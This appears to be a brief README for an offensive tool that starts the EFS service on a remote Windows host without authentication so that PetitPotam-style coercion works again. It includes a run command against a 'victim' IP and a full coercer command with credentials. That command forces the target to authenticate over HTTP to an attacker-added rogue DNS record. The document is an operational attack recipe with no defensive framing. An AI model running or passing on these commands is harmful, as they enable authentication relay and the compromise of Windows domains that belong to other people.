#
rpc2efs.md
A cool tool for performing "Unauthenticated start EFS service on remote Windows host (make PetitPotam great again)."
#
Install/run
- Get impacket installed
- Run against a system you need to coerce from, such as a Win 11 enterprise box!
python3 rpc2efs.py ip.address.of.victim
# Once run, the output should say:
# [*] EFS should be running now.
#
Attack
coercer coerce --auth-type http -u lowpriv -p 'MyPassLOL!' -l ROGUE-DNS-RECORD-I-ADDED-PREVIOUSLY -t ip.of.victim2.coerce --filter-pipe-name efsrpc